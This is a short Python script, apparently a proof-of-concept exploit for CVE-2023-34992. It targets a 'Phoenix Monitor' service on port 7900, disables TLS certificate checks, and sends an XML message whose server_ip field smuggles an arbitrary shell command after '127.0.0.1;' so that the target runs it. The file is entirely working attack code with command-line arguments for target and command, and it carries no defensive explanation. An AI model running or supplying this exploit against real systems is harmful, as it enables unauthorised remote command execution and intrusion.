CVE-2023-34992.py

#!/usr/bin/python3
import argparse
import socket
import struct
import ssl

payload = """<TEST_STORAGE type="nfs">
    <server_ip>127.0.0.1; {};</server_ip>
    <mount_point>/test</mount_point>
</TEST_STORAGE>
"""

def send_command(target: str, port: int, payload: str):
    c = ssl.create_default_context()
    c.check_hostname = False
    c.verify_mode = ssl.CERT_NONE
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        with c.wrap_socket(s, server_hostname=target) as ss:
                ss.connect((target, port))

                msg = b''
                msg += struct.pack('<I', 81)
                msg += struct.pack('<I', len(payload))
                msg += struct.pack('<I', 1075724911)
                msg += struct.pack('<I', 0)
                msg += payload.encode()
                print(f'[*] Sending:\n{payload}')

                ss.sendall(msg)
                print(f'[+] Sent!')
               
                d = ss.recv(1024)
                print(f'[+] Recevied: {d}')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-p', '--port', help='The port of the Phoenix Monitor service', type=int, default=7900)
    parser.add_argument('-c', '--command', help='The command to blindly execute', required=True)
    args = parser.parse_args()

    send_command(args.target, args.port, payload.format(args.command))